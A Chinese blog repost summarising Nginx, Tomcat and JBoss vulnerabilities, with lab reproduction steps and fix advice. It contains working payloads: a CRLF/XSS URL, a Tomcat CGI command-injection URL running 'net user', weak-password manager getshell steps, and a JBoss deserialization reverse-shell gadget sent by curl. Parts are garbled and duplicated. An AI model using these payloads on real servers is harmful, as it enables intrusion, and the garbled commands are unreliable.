最新Web中间件常见安全漏洞总结_web中间件常见漏洞总结(1),2024年最新35岁程序员的人生感悟

img
img

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

<input type="submit" value="上传文件" />
</form>
<?php if(isset($_FILES['file'])) { $name = basename($_POST['name']); $ext = pathinfo($name,PATHINFO_EXTENSION); if(in\_array($ext, ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'])) { exit('bad file'); } echo "ok"; move\_uploaded\_file($_FILES['file']['tmp\_name'], './' . $name); } ?>

![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814104209860.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 点击Go后,效果如下:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814104224789.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 相同代码在Linux下进行测试,可以正常写入。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814104321277.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 访问:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814104334778.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814104356959.png#pic_center)  
 限制:获取文件名时不能用$\_FILES[‘file’][‘name’],因为它会自动把换行去掉。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814104415187.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 **修复建议 :**


1. 升级到最新版本
2. 或将上传的文件重命名为为时间戳+随机数+.jpg的格式并禁用上传文件目录执行脚本权限。


## Nginx配置文件错误导致的解析漏洞


对于任意文件名,在后面添加/xxx.php(xxx为任意字符)后,即可将文件作为php解析。


例:info.jpg后面加上/xxx.php,会将info.jpg 以php解析。


这里使用phpstudy2014 ,Nginx + PHP5.3n进行复现(以下复现若无特别说明均采用此环境)


结果:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814110234725.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 该漏洞是Nginx配置所导致,与Nginx版本无关,下面是常见的漏洞配置。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814110246828.png#pic_center)


当攻击者访问/info.jpg/xxx.php时, Nginx将查看URL,看到它以.php结尾,并将路径传递给PHP fastcgi处理程序。


Nginx传给php的路径为c:/WWW/info.jpg/xxx.php, 在phpinfo中可以查看\_SERVER[“ORIG\_SCRIPT\_FILENAME”]得到。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814110258539.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)


PHP根据URL映射,在服务器上寻找xxx.php文件,但是xxx.php不存在,又由于cgi.fix\_pathinfo默认是开启的,因此PHP会继续检查路径中存在的文件,并将多余的部分当作 PATH\_INFO。接着PHP在文件系统中找到.jpg文件,而后以PHP的形式执行.jpg的内容,并将/xxx.php存储在 PATH\_INFO 后丢弃,因此我们在phpinfo中的$\_SERVER[‘PATH\_INFO’]看的到值为空。


Note: php的一个选项:cgi.fix\_pathinfo,该选项默认开启,值为1,用于修理路径, 例如:当php遇到文件路径"/info.jpg/xxx.php/lxh.sec"时,若"/info.jpg/xxx.php/lxh.sec"不存在,则会去掉最后的"/lxh.sec",然后判断"/info.jpg/xxx.php"是否存在, 若存在则将/info.jpg/xxx.php当作文件/info.jpg/xxx.php/lxh.sec,若/info.jpg/xxx.php仍不存在,则继续去掉xxx.php,依此类推。


**修复建议**


1.配置cgi.fix\_pathinfo(php.ini中)为0并重启php-cgi程序。  
 2.或如果需要使用到cgi.fix\_pathinfo这个特性(例如:Wordpress),那么可以禁止上传目录的执行脚本权限。或将上传存储的内容与网站分离,即站库分离。  
 3.或高版本PHP提供了security.limit\_extensions这个配置参数,设置security.limit\_extensions = .php  
 **Nginx 空字节任意代码执行漏洞**


影响版本:Nginx 0.5\*, 0.6\*,0.7 <= 0.7.65,0.8 <= 0.8.37  
 Windows环境 Nginx 0.7.65+php 5.3.2  
 在nginx-0.7.65/html/目录下创建info.jpg,内容为<?php phpinfo();?>,  
 访问info.jpg,并抓包,修改为info.jpg…php,在Hex选修卡中将jpg后面的.,更改为00.  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814110324372.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 Note:该漏洞不受cgi.fix\_pathinfo影响,当其为0时,依旧解析。


**Nginx 文件名逻辑漏洞(CVE-2013-4547)**


影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7  
 使用Vulhub的docker进行复现。  
 访问http://your-ip:8080/ 上传文件  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814110348791.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 访问http://your-ip:8080/uploadfiles/info.jpg, 并抓包,修改为info.jpg…php, 在Hex选修卡中将jpg后面的两个点2e改成20,00 点击Go,如下。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814110359112.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 Note:该漏洞不受cgi.fix\_pathinfo影响,当其为0时,依旧解析,在Windows上有所限制。


**修复建议**


1. 设置security.limit\_extensions = .php
2. 或升级Nginx


**Nginx 配置错误导致的安全问题**


**CRLF注入**  
 查看Nginx文档,可以发现有三个表示uri的变量:


1. 
 
 
 
 
 u 
 
 
 r 
 
 
 i 
 
 
 2. 
 
 
 
 uri 2. 
 
 
 uri2.document\_uri  
 3.$request\_uri


1和2表示的是解码以后的请求路径,不带参数;3表示的是完整的URI(没有解码)  
 Nginx会将1,2进行解码,导致传入%0a%0d即可引入换行符,造成CRLF注入漏洞。


错误配置:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814110438961.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 访问:  
 http://127.0.0.1/%0aX-XSS-Protection:%200%0a%0d%0a%0d%3Cimg%20src=1%20οnerrοr=alert(/xss/)%3E  
 将返回包的Location端口设置为小于80,使得浏览器不进行跳转,执行XSS。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2020081411045518.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 结果:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814110504753.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 **修复建议**  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814110516920.png#pic_center)  
 目录穿越  
 Nginx在配置别名(Alias)的时候,如果忘记加/,将造成一个目录穿越漏洞。  
 错误的配置文件示例(原本的目的是为了让用户访问到C:/WWW/home/目录下的文件):



location /files {
autoindex on;
alias c:/WWW/home/;
}
?>


结果:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814110802796.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 **修复建议**


只需要保证location和alias的值都有后缀/或都没有/这个后缀。


目录遍历  
 当Nginx配置文件中,autoindex 的值为on时,将造成一个目录遍历漏洞。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2020081411081711.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 结果:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814110842496.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 **修复建议**


将autoindex 的值为置为off。


**add\_header被覆盖**  
 Nginx的配置文件分为Server、Location等一些配置块,并且存在包含关系,子块会继承父块的一些选项,比如add\_header


如下配置中,整站(父块中)添加了CSP头:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814110910359.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 正常情况下访问:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2020081411092475.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 当访问 /test2时,XSS被触发。因/test2的location中添加了X-Content-Type-Options头,导致父块中的add\_header全部失效。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814110956849.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)


## Tomcat


Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用 服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache服务器,可利用它响应HTML( 标准通用标记语言下的一个 应用)页面的访问请求。实际上Tomcat是Apache服务器的扩展,但运行时它是独立运行的,所以当运行tomcat 时,它实际上作为一个与Apache独立的进程单独运行的。


**Tomcat 任意文件写入(CVE-2017-12615)**


环境:Tomcat/8.0.30


漏洞本质是Tomcat配置文件/conf/web.xml 配置了可写(readonly=false),导致我们可以往服务器写文件:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814111022195.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 增加完配置之后,记得重启Tomcat,效果如下:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814111101601.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 当readonly=true时,效果如下:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814111119809.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 修复建议


将readonly=true,默认为true。


## Tomcat 远程代码执行(CVE-2019-0232)


影响范围:9.0.0.M1 ~ 9.0.17, 8.5.0 ~ 8.5.39 , 7.0.0 ~ 7.0.93  
 影响系统:Windows  
 测试环境:  
 Apache Tomcat v8.5.39 J  
 DK 1.8.0\_144


**修改配置:**


web.xml  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2020081411141730.png#pic_center)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814111428747.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 content.xml  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814111446959.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 在Tomcat\webapps\ROOT\WEB-INF新建cgi目录,并创建lxhsec.bat文件,内容任意。


访问http://127.0.0.1:8080/cgi-bin/lxhsec.bat?&dir  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814111503512.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 执行命令http://127.0.0.1:8080/cgi-bin/lxhsec.bat?&C:/WINDOWS/system32/net+user


Note:net命令的路径要写全,直接写net user,Tomcat控制台会提示net不是内部命令,也不是可运行的程序,另 必须使用+号连接,使用空格,%2B都会执 行失败,控制台报错


## Tomcat + 弱口令 && 后台getshell漏洞


环境:Apache Tomcat/7.0.94


在conf/tomcat-users.xml文件中配置用户的权限:




正常安装的情况下,tomcat7.0.94中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击。


访问 http://127.0.0.1:8080/manager/html ,输入弱密码tomcat:tomcat,登陆后台。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814111539351.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 部署后,访问 http://127.0.0.1:8080/war包名/包名内文件名, 如下。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2020081411155644.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 **修复建议**


1. 若无必要,取消manager/html功能。
2. 若要使用,manager页面应只允许本地IP访问  
 Tomcat manager App 暴力破解  
 环境:Apache Tomcat/7.0.94  
 访问:http://127.0.0.1:8080/manager/html, 输入密码,抓包,如下。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814111610709.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 刚才输入的账号密码在HTTP字段中的Authorization中,规则为Base64Encode(user:passwd)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814111626538.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 **修复建议**
3. 若无必要,取消manager/html功能。
4. 若要使用,manager页面应只允许本地IP访问


## JBoss


jBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。


默认端口:8080,9990


Windows下Jboss安装:


1. 下载 http://jbossas.jboss.org/downloads/
2. 解压,我这里解压后的目录为:C:\jboss-6.1.0.Final
3. 新建环境变量:  
 JBOSS\_HOME 值为:C:\jboss-6.1.0.Final  
 在path中加入:;%JBOSS\_HOME%\bin;
4. 打开C:\jboss-6.1.0.Final\bin 双击run.bat。出现info消息,即配置成功  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814111809613.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 Note:注意JDK版本要在1.6~1.7之间,1.8版本jBoss运行打开 JMX Console会出现500错误。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814111822903.png#pic_center)  
 jboss默认部署路径:C:\jboss-6.1.0.Final\server\default\deploy\ROOT.war  
 设置外网访问:


打开C:\jboss-6.1.0.Final\server\default\deploy\jbossweb.sar\server.xml  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814111841765.png#pic_center)  
 将address="${jboss.bind.address}" 设置为address=“0.0.0.0” ,并重启JBoss


**JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)**  
 访问 /invoker/readonly 返回500,说明页面存在,此页面存在反序列化漏洞。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814111906180.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 利用工具:https://github.com/joaomatosf/JavaDeserH2HC  
 我们选择一个Gadget:ReverseShellCommonsCollectionsHashMap,编译并生成序列化数据:  
 生成ReverseShellCommonsCollectionsHashMap.class



javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java


利用工具:https://github.com/joaomatosf/JavaDeserH2HC  
 我们选择一个Gadget:ReverseShellCommonsCollectionsHashMap,编译并生成序列化数据:  
 生成ReverseShellCommonsCollectionsHashMap.class



javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java


生成ReverseShellCommonsCollectionsHashMap.ser



javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java


利用:



curl http://192.168.31.205:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser


![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814112032863.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 或者


java反序列化终极测试工具  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814112050710.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)


## JBoss JMXInvokerServlet 反序列化漏洞


访问 /invoker/JMXInvokerServlet  
 返回如下,说明接口开放,此接口存在反序列化漏洞。  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814112115837.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 这里直接利用CVE-2017-12149生成的ser,发送到/invoker/JMXInvokerServlet接口中。


如下:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814112135127.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)


## JBoss EJBInvokerServlet 反序列化漏洞


访问 /invoker/EJBInvokerServlet  
 返回如下,说明接口开放,此接口存在反序列化漏洞  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200814112158604.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQwOTA3OTc3,size_16,color_FFFFFF,t_70#pic_center)  
 这里直接利用CVE-2017-12149生成的ser,发送到/invoker/EJBInvokerServlet接口中。




![img](https://img-blog.csdnimg.cn/img_convert/7c03527c65c3738361a9fd1495f59dff.png)
![img](https://img-blog.csdnimg.cn/img_convert/b161bb7bd41b59e0e7da0ecf2b621554.png)
![img](https://img-blog.csdnimg.cn/img_convert/af9c61ec0fee704e42ee9cc3d34f47a8.png)

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!**

**由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**

**[需要这份系统化的资料的朋友,可以戳这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

-12149生成的ser,发送到/invoker/EJBInvokerServlet接口中。




[外链图片转存中...(img-xOzJ9KiP-1715490059640)]
[外链图片转存中...(img-KjEbbEbL-1715490059640)]
[外链图片转存中...(img-j7rhXVFL-1715490059640)]

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!**

**由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**

**[需要这份系统化的资料的朋友,可以戳这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值